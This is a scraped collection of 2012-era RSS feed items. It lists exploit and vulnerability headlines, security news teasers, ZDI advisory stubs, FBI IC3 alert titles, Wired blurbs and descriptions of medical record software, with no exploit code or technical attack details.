==> web - Joomla Freestyle Support com_fss SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Joomla Component com_tag SQL Injection Exploit

http://www.1337day.com/rss

==> web - Legrand-003598 / Bticino-F454 Credential Disclosure

http://www.1337day.com/rss

==> dos / - Internet Explorer 9 XSS Filter Bypass

http://www.1337day.com/rss

==> local - Oracle Database Authentication Protocol Security Bypass

http://www.1337day.com/rss

==> web - PHP-eSeller SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Visual Tools DVR Command Injection / Password Disclosure

http://www.1337day.com/rss

==> web - PBBoard 3.0.0 Cross Site Scripting / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - Oracle WebCenter Sites (FatWire Content Server) Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - ManageEngine Support Center Plus <= 7908 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Symphony CMS 2.3 Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Sisfokol 4.0 Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - Desarrollo Web Peru - Default Login Access / SQL Injection Vulnerabilities

http://www.1337day.com/rss

==> web - UvumiTools Crop 2.0.0 - Arbitrary File Upload Vulnerability

http://www.1337day.com/rss

==> web - BigPond 3G21WB Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - airVisionNVR 1.1.13 readfile() Disclosure and SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Cartweaver 3 Local File Inclusion Vulnerability

http://www.1337day.com/rss

==> web - AjaXplorer checkInstall.php Remote Command Execution

http://www.1337day.com/rss

==> dos / - QQPlayer 3.7.892 m2p quartz.dll heap pointer overwrite PoC

http://www.1337day.com/rss

==> local - Huawei Technologies Internet Mobile Unicode SEH Exploit

http://www.1337day.com/rss

==> local - Windows Escalate Service Permissions Local Privilege Escalation

http://www.1337day.com/rss

==> web - WebGin SQL Injection Vulnerability

http://www.1337day.com/rss

==> local - Cisco WebEx .wrf Memory Corruption

http://www.1337day.com/rss

==> remote - Metasploit < v4.4 pcap_log Plugin Privilege Escalation Exploit

http://www.1337day.com/rss

==> web - Atarim SQL Injection Vulnerability

http://www.1337day.com/rss

==> remote - KeyHelp ActiveX LaunchTriPane Remote Code Execution

http://www.1337day.com/rss

==> remote - Project Pier Arbitrary File Upload

http://www.1337day.com/rss

==> local - PHP 5.3.4 com_event_sink 0-Day

http://www.1337day.com/rss

==> local - Apple iOS Default SSH Password

http://www.1337day.com/rss

==> web - Spicy E-commerce - SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - PhpTax pfilez Parameter Exec Remote Code Injection

http://www.1337day.com/rss

==> web - TECNO DYNAMICS - Sql injection / Local File Include Vulnerabilities

http://www.1337day.com/rss

==> dos / - Gom Player 2.1.44.5123 (Unicode) NULL pointer dereference vulnerability

http://www.1337day.com/rss

==> dos / - FL Studio 10 Producer Edition SEH Based Buffer Overflow PoC

http://www.1337day.com/rss

==> local - PLIB 1.8.5 ssg/ssgParser.cxx Buffer Overflow

http://www.1337day.com/rss

==> local - VLC Player 2.0.3 <= ReadAV Arbitrary Code Execution

http://www.1337day.com/rss

==> remote - Avaya WinPMD UniteHostRouter Buffer Overflow

http://www.1337day.com/rss

==> remote - Avaya IP Office Customer Call Reporter Command Execution

http://www.1337day.com/rss

==> web - ServersCheck Monitoring Software v9.0.12 / 9.0.14 - Stored XSS

http://www.1337day.com/rss

==> local - Windows Escalate UAC Execute RunAs

http://www.1337day.com/rss

==> remote - Oracle Business Transaction Management FlashTunnelService Remote Code Execution

http://www.1337day.com/rss

==> remote - HP Application Lifecycle Management XGO.ocx ActiveX SetShapeNodeType() Remote Code Execution

http://www.1337day.com/rss

==> web - Viral Membership System Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - site2host (cms.php) SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - Arctic Torrent 1.2.3 <= Remote Memory Corruption

http://www.1337day.com/rss

==> web - Web Help Desk XSS Vulnerability

http://www.1337day.com/rss

==> web - live church streaming (events.php) SQL Injection Vulnerability

http://www.1337day.com/rss

==> remote - Apple iOS MobileMail LibTIFF Buffer Overflow

http://www.1337day.com/rss

==> web - Blog Mod <= 0.1.9 SQL Injection Vulnerability

http://www.1337day.com/rss

==> web - Get Short & Protected Link Remote String Based SQLi (perl)

http://www.1337day.com/rss

==> web - Cims empdata.mdb Database Disclosure Exploit

http://www.1337day.com/rss

==> web - MythPhp CSRF Change User Password Vulnerability

http://www.1337day.com/rss

==> local - Windows Escalate UAC Protection Bypass

http://www.1337day.com/rss

==> web - Epop Studio sql injection Vulnerability

http://www.1337day.com/rss

==> web - WordPress Shopp v1.0.17 - eCommerce Plugin <= XSS/LFI Vulnerabilities

http://www.1337day.com/rss

==> local - FastStone Image Viewer 4.6 <= ReadAVonIP Arbitrary Code Execution

http://www.1337day.com/rss

==> remote - QNX QCONN Remote Command Execution Vulnerability (2)

http://www.1337day.com/rss

==> web - Oracle Identity Management 10g Cross Site Scripting

http://www.1337day.com/rss

==> web - Template CMS 2.1.1 Cross Site Request Forgery / Cross Site Scripting

http://www.1337day.com/rss

==> web - phpMyBitTorrent 2.04 SQL Injection / Local File Inclusion

http://www.1337day.com/rss

==> web - phpMyChat Plus v1.94 RC1 Multiple Remote Vulnerabilities

http://www.1337day.com/rss

==> web - Joomla Component com_huruhelpdesk Remote SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - Cyme ChartFX Client Server ActiveX Control Array Indexing Vulnerability

http://www.1337day.com/rss

==> local - JPEGsnoop 1.5.2 <= WriteAV Arbitrary Code Execution Vulnerability

http://www.1337day.com/rss

==> local - Hardcoreview WriteAV Arbitrary Code Execution Vulnerability

http://www.1337day.com/rss

==> remote - InduSoft Web Studio Arbitrary Upload Remote Code Execution Vulnerability

http://www.1337day.com/rss

==> web - Fantastico Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Censura XSS/SQLi Vulnerabilities

http://www.1337day.com/rss

==> web - ProjectPier 0.8.8 Shell Upload

http://www.1337day.com/rss

==> web - TP-LINK TD-W8151N Cross Site Request Forgery

http://www.1337day.com/rss

==> web - Small-CMS 1.0 SQL Injection Vulnerability

http://www.1337day.com/rss

==> remote - MS11-080 AfdJoinLeaf Privilege Escalation

http://www.1337day.com/rss

==> remote - Dart Communications Stack Overflow Vulnerability

http://www.1337day.com/rss

==> web - Wordpress Plugin spider calendar Multiple Vulnerabilities

http://www.1337day.com/rss

==> web - Diy21 CMS v3.10 (product.php) SQL Injection Vulnerability

http://www.1337day.com/rss

==> dos / - Hiro Player 1.6.0 (.mp3) Local Crash PoC

http://www.1337day.com/rss

==> local - NCMedia Sound Editor Pro v7.5.1 SEH&DEP

http://www.1337day.com/rss

==> web - EasyFeeds CSRF/SQLi Vulnerabilities

http://www.1337day.com/rss

==> web - phptax 0.8 <= Remote Code Execution Vulnerability

http://www.1337day.com/rss

==> Leading Indian banking portals contain glaring security lapses

http://feeds.pheedo.com/tt/1323 Even as Internet banking portals transform the way Indians bank, vulnerabilities exist in banking websites like SBI, Citibank India, HDFC Bank and ICICI Bank.

==> MiniFlame spyware extremely targeted, but could pose future threat

http://feeds.pheedo.com/tt/1323 MiniFlame is highly specific espionage malware, but experts indicate that financially motivated cybercriminals could make the threat more widespread.

==> Web app design at the core of coding weaknesses, attacks, says expert

http://feeds.pheedo.com/tt/1323 When addressing Web application threats and vulnerabilities, security teams need to look out for design flaws, says Mike Shema of Qualys, Inc.

==> How to comply with updated NIST incident response guidelines

http://feeds.pheedo.com/tt/1323 NIST recently updated its incident response guidelines. Find out how to comply with these changes and incorporate them into an incident response plan.

==> Tips to overcome information rights management implementation challenges

http://feeds.pheedo.com/tt/1323 Information rights management provides foolproof protection for information, but lack of awareness in India often prevents successful IRM implementation.

==> Airtel's ISO 27001 certification tale: Benefits, challenges & lessons

http://feeds.pheedo.com/tt/1323 Leading Indian telecom player Bharti Airtel's ISO 27001 implementation is one of the largest in the world. Join us, as we take a peek under the hood.

==> Vulnerabilities in JavaScript: Secure coding insights and tips

http://feeds.pheedo.com/tt/1323 JavaScript vulnerabilities are on the rise in India with the entry of HTML5 and faster JavaScript engines. Here are some key problem areas along with antidotes.

==> Paladion

http://feeds.pheedo.com/tt/1323 Paladion Networks is a Bengaluru, India-based provider of information security products and services.

==> Age-old vulnerabilities, attack techniques consistently trip enterprises

http://feeds.pheedo.com/tt/1323 Windows security has improved, but longstanding Unix and network vulnerabilities remain an easy target for determined attackers.

==> Adobe to revoke certificate following fraudulent use

http://feeds.pheedo.com/tt/1323 Malicious utilities were created using the fraudulent certificates to appear to be valid Adobe products running on Windows systems.

==> Some activist DDoS attacks growing in sophistication, expert says

http://feeds.pheedo.com/tt/1323 Most distributed denial-of-service attacks are easily filtered out, but individuals with the technical skills can mirror legitimate traffic.

==> Research firm discovers new Java sandbox vulnerability

http://feeds.pheedo.com/tt/1323 A Java sandbox flaw could allow malicious code to run on any system running Java 5, 6, or 7. Users are advised to disable the Java browser plugin.

==> Targeted attackers often gain upper hand once inside, says Trend Micro

http://feeds.pheedo.com/tt/1323 Once inside, skilled attackers can scout for exploitable flaws and set up private communication channels to support cyberespionage campaigns.

==> Limitations of two factor authentication (2FA) technology

http://feeds.pheedo.com/tt/1323 The common two factor authentication (2FA) techniques used in India have several shortfalls. We take a look at security risks associated with 2FA solutions.

==> ESET calls Flashback Trojan threat now 'extinct'

http://feeds.pheedo.com/tt/1323 ESET reports on how the Flashback Trojan changed the relationship between Apple and Java.

==> Three cybercrime myths and how to counter such risks

http://feeds.pheedo.com/tt/1323 Cybercrime risks and threats are now common in India. We dispel common myths and offer measures to help counter any such issues that you might face.

==> TPTI-12-05 - Oracle AutoVue ActiveX SetMarkupMode Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-06 - Hewlett-Packard Data Protector DtbClsAddObject Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-04 - Samba NDR PULL EVENTLOG ReportEventAndSourceW Heap Overflow Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-03 - Adobe Reader X True Type Font MINDEX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of an Oracle product.

==> TPTI-12-02 - Novell iPrint Client ActiveX GetPrinterURLList2 Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories

==> TPTI-12-01 - Oracle Java True Type Font IDEF Opcode Parsing Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Oracle Java. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-15 - Novell ZENWorks Software Packaging ISGrid.Grid2.1 bstrSearchText Parameter Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell ZENWorks. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-14 - Adobe Shockwave DEMX Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Adobe Shockwave. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

==> TPTI-11-13 - McAfee SaaS myCIOScn.dll Scan Method Script Injection Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> TPTI-11-12 - McAfee SaaS MyAsUtil5.2.0.603.dll SecureObjectFactory Instantiation Design Flaw Remote Code Execution Vulnerability

http://feeds.feedburner.com/DvlabsPublishedAdvisories This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of a McAfee product.

==> Smartphone Malware Safety Tips

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (September 19, 2012)

http://www.ic3.gov/rss/news.xml

==> Fraud Alert Cyber Criminals Targeting Financial Institution Employee Credentials to Conduct Wire Transfer Fraud

http://www.ic3.gov/rss/news.xml

==> Lawyers' Identities Being Used For Fake Websites and Solicitations

http://www.ic3.gov/rss/news.xml

==> Citadel Malware Continues to Deliver Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (August 08, 2012)

http://www.ic3.gov/rss/news.xml

==> Citadel Malware Delivers Reveton Ransomware in Attempts to Extort Money

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (May 23, 2012)

http://www.ic3.gov/rss/news.xml

==> IC3 2011 Annual Report on Internet Crime Released

http://www.ic3.gov/rss/news.xml

==> Malware Installed on Travelers' Laptops Through Software Updates on Hotel Internet Connections

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (April 20, 2012)

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (March 27, 2012)

http://www.ic3.gov/rss/news.xml

==> U.S. Law Firms Continue to be the Target of a Counterfeit Check Scheme

http://www.ic3.gov/rss/news.xml

==> Justice Department and FBI Raise Awareness of Disaster Fraud Hotline

http://www.ic3.gov/rss/news.xml

==> New Variation on Telephone Collection Scam Related to Delinquent Payday Loans

http://www.ic3.gov/rss/news.xml

==> IC3 Scam Alerts (February 17, 2012)

http://www.ic3.gov/rss/news.xml

==> Timeshare Marketing Scams

http://www.ic3.gov/rss/news.xml

==> Fraud Alert Involving E-mail Intrusions to Facilitate Wire Transfers Overseas

http://www.ic3.gov/rss/news.xml

==> Joint FBI and DHS Public Service Announcement: Best Practices For Recovery From the Malicious Erasure of Files

http://www.ic3.gov/rss/news.xml

==> ZDI-CAN-1433: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2012-08-21, 38 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1339: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2012-08-21, 38 days ago. The vendor is given until 2013-02-17 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1590: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'James Forshaw (tyranid)' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1587: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'James Forshaw (tyranid)' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1568: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Tenable Network Security' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1536: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1535: Cisco

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Nenad Stojanovski' was reported to the affected vendor on: 2012-07-24, 66 days ago. The vendor is given until 2013-01-20 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1528: WebKit.Org

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'pa_kt / twitter.com/pa_kt' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1527: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'James Burton' and ' Insomnia Security' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1513: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1512: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1511: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1510: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1509: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1501: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Chris Ries' was reported to the affected vendor on: 2012-03-14, 198 days ago. The vendor is given until 2012-09-10 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1468: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'e6af8de8b1d4b2b6d5ba2610cbf9cd38' was reported to the affected vendor on: 2011-12-22, 281 days ago. The vendor is given until 2012-06-19 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> ZDI-CAN-1480: Oracle

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'gwslabs.com' was reported to the affected vendor on: 2011-12-19, 284 days ago. The vendor is given until 2012-06-16 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1385: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'aazubel' was reported to the affected vendor on: 2011-11-29, 304 days ago. The vendor is given until 2012-05-27 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1437: Honeywell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Anonymous' was reported to the affected vendor on: 2011-11-23, 310 days ago. The vendor is given until 2012-05-21 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1429: Hewlett-Packard

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.8 (AV:N/AC:L/Au:N/C:N/I:N/A:C) severity vulnerability discovered by 'ptzool' was reported to the affected vendor on: 2011-11-04, 329 days ago. The vendor is given until 2012-05-02 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1322: RealNetworks

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrzej Dyjak' was reported to the affected vendor on: 2011-10-28, 336 days ago. The vendor is given until 2012-04-25 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1383: Apple

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Alin Rad Pop' was reported to the affected vendor on: 2011-10-21, 343 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1350: RealNetworks

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Luigi Auriemma' was reported to the affected vendor on: 2011-10-21, 343 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a

==> ZDI-CAN-1347: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 10 (AV:N/AC:L/Au:N/C:C/I:C/A:C) severity vulnerability discovered by 'Francis Provencher From Protek Research Lab's' was reported to the affected vendor on: 2011-10-21, 343 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1191: RealNetworks

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 9 (AV:N/AC:L/Au:N/C:P/I:P/A:C) severity vulnerability discovered by 'Dan Rosenberg of Virtual Security Research' and 'Damian Put' was reported to the affected vendor on: 2011-10-21, 343 days ago. The vendor is given until 2012-04-18 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the

==> ZDI-CAN-1329: Novell

http://feeds.feedburner.com/ZDI-Upcoming-Advisories A CVSS score 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P) severity vulnerability discovered by 'Andrea Micalizzi aka rgod' was reported to the affected vendor on: 2011-08-12, 413 days ago. The vendor is given until 2012-02-08 to publish a fix or workaround. Once the vendor has created and tested a patch we will coordinate the release of a public

==> Webroot SecureAnywhere 2013 adds protection for Mac OS X

http://feeds.pcworld.com/pcworld/blogs/security_alert/ Webroot SecureAnywhere 2013 is here. The new security suite from Webroot includes a variety of updates in the areas of performance, and the overall user experience. But, the most notable feature of SecureAnywhere 2013 is that it now also protects Mac OS X. Let's start with a look at SecureAnywhere in general. While the overall goal of the software is the same as competing antimalware and security suites, and it seems logical to compare them, SecureAnywhere is a whole new approach. Webroot completely threw out its flagship products, and started over by building SecureAnywhere around a more proactive philosophy based off the acquisition of Prevx. Webroot SecureAnywhere is a whole different approach to defending against malware. The result is protection for your PCs and mobile devices that delivers blazing performance, and has virtually no impact on system resources compared with the traditional approach of rival products. The entire install occupies a mere 750KB (with a K) on your hard drive. It installs in seconds, and according to metrics from Webroot, the software uses 91 percent less memory than competitors, and completes full system scans in about a minute, 116 times faster than average antimalware scans. SecureAnywhere is a comprehensive security suite that includes a built-in firewall (only in Webroot SecureAnywhere Complete 2013), identity and privacy protection, social network protection, and seven specialized security shields, three of which are new to SecureAnywhere 2013. The USB Shield blocks attacks and malware from removable drives, the Offline Shield protects the system against persistent threats even when it's not connected to the Internet, and the Zero Day Shield identifies new or changing threats to defend against emerging attacks. 
One of the benefits of SecureAnywhere is that it's a single security solution that can protect multiple platforms, including PCs, as well as iOS and Android mobile devices. The biggest improvement in SecureAnywhere 2013, though, is the addition of Mac OS X as a supported platform. Mac OS X has benefited for years from security by obscurity, but it has gained enough market share to capture the attention of attackers. Many Mac users are naive when it comes to malware and online threats, and make the mistake of assuming Mac OS X is somehow inherently invulnerable. Attacks like MacDefender and the Flashback Trojan were a wakeup call, though, and more users are starting to realize that their Mac needs protection, and SecureAnywhere is a solid option. Users who invest in SecureAnywhere Complete 2013 also get the benefit of online backup and file syncing. Webroot provides 25GB of cloud-based storage, protected with strong encryption. Files can be securely stored and synced across devices, so data from a PC or Mac can be accessed from another PC or Mac, or even from an iOS or Android mobile device. Webroot SecureAnywhere 2013 is available now, starting at $39.99.

==> License Plate Frame Foils Irksome Traffic-Light Cameras

http://feeds.wired.com/wired27b Traffic-light tickets have ticked off a gazillion drivers, some of whom have had to fork over $500 for running a light. Now there's a way for you to throw a monkey wrench into that money-making machine.

==> Inside the Mansion—and Mind— of Kim Dotcom, the Most Wanted Man on the Net

http://feeds.wired.com/wired27b Please Choose One of the Following Statements: A. Kim Dotcom is not a pirate. He's a hero. The savior of my online liberties. A visionary digital entrepreneur. His company Megaupload was a legitimate data-storage business used by hundreds of millions ...

==> Megaupload Is Dead. Long Live Mega!

http://feeds.wired.com/wired27b Megaupload's takedown by the U.S. government spurs Kim DotCom to build a filesharing replacement that relies on encryption so owners can't be blamed for knowing that copyright infringing files are on company servers. That, DotCom thinks, will probably keep the ...

==> Hacker Fight: Everything You’ve Been Told About Passwords Is Wrong

http://feeds.wired.com/wired27b As someone who has studied millions of passwords and how they were constructed, I've spent most of my waking hours for over a decade obsessing about authentication methods. I say we can have both security and practicality. But ...

==> Russian Anti-Virus Firm Plans Secure Operating System to Combat Stuxnet

http://feeds.wired.com/wired27b Russian anti-virus firm Kaspersky Lab announced on Tuesday that it plans to develop a secure operating system for use with critical infrastructure systems, but a security expert says the chance of such a system being adopted is a longshot.

==> Pentagon Hacker McKinnon Wins 10-Year Extradition Battle

http://feeds.wired.com/wired27b Accused British hacker Gary McKinnon has won his ten-year battle to resist extradition to the U.S. on charges that he hacked Pentagon computers in the U.S.

==> As Drone Debate Rages, Police Move on to Million-Dollar Spy Planes

http://feeds.wired.com/wired27b Drones? Who needs stinking drones when you have an all-seeing manned plane? That seems to be what Texas and other border states are thinking with multi-million dollar purchases of high-tech spy planes.

==> Who Bought Your Politician? Check With Our Embeddable Widget

http://feeds.wired.com/wired27b Ask any politician whether campaign contributions influence their decisions, and they'll tell you certainly not. Ask anybody else whose nose isn't growing, and they'll give the opposite answer. With that in mind, we at Wired are introducing a web-based embeddable ...

==> State-Sponsored Malware ‘Flame’ Has Smaller, More Devious Cousin

http://feeds.wired.com/wired27b Researchers have uncovered new nation-state espionage malware with ties to two previous espionage tools known as Flame and Gauss, and that appears to be a "high-precision, surgical attack tool" targeting victims in Lebanon, Iran and elsewhere.

==> Task Force Tells DHS to Offer ‘Cool’ Cybersecurity Jobs to Gov. Workers and Test Them Like Pilots

http://feeds.wired.com/wired27b In order to attract the highly skilled and qualified cybersecurity workers the Department of Homeland Security needs to fulfill its mission of protecting government computer systems and overseeing the security of critical infrastructure systems, DHS has to reserve its coolest ...

==> How to Select a Web Host

http://feeds.feedburner.com/Docucrunch?format=xml Creating a new website? Not sure how to choose from among all the options? Need shared hosting, small business hosting, or VPS hosting? Lots of email accounts? 5-star reliability rating? Fortunately, there's information available to help. The Best Web Hosts is a great resource that will help you select the best web hosting company. It features [...]

==> Lytec MD

http://feeds.feedburner.com/Docucrunch?format=xml Lytec MD is a combination of an electronic health record and a practice management solution (Lytec 2010). It is housed on the practice's server and is intended for practices that already use Lytec 2010 and want to use both EMR and PM features in one package. Lytec MD has received the ONC-ATCB 2011/2012 certification as [...]

==> Intivia InSync

http://feeds.feedburner.com/Docucrunch?format=xml Intivia InSync is electronic medical record software that allows for doctors and staff to coordinate patient care while reducing paper records and time-consuming administrative tasks. It includes all facets of an electronic medical record: document management (scanning old paper records and patient identification), electronic charts and prescribing, practice management (i.e. appointment scheduling), and medical billing. [...]

==> Meditab Intelligent Medical Software (IMS)

http://feeds.feedburner.com/Docucrunch?format=xml Meditab's Intelligent Medical Software (IMS) combines features of both electronic medical records (EMR) and practice management (PM) into one package, a so-called electronic medical office. It is suited for small, medium, and large medical practices and has various packages that are aimed toward specific specialties (i.e. pediatrics, OB/GYN, internal medicine, etc). Practices can choose to [...]

==> iSalus Healthcare OfficeEMR

http://feeds.feedburner.com/Docucrunch?format=xml iSalus Healthcare OfficeEMR is a web-based solution that combines electronic medical record features with practice management functions. It is hosted on iSalus servers so medical practices do not need to purchase any servers, software, or other relevant expenditures. Nor would they have to worry about upgrading any software. They would only need to pay a [...]

==> Noteworthy NetPractice EHRweb

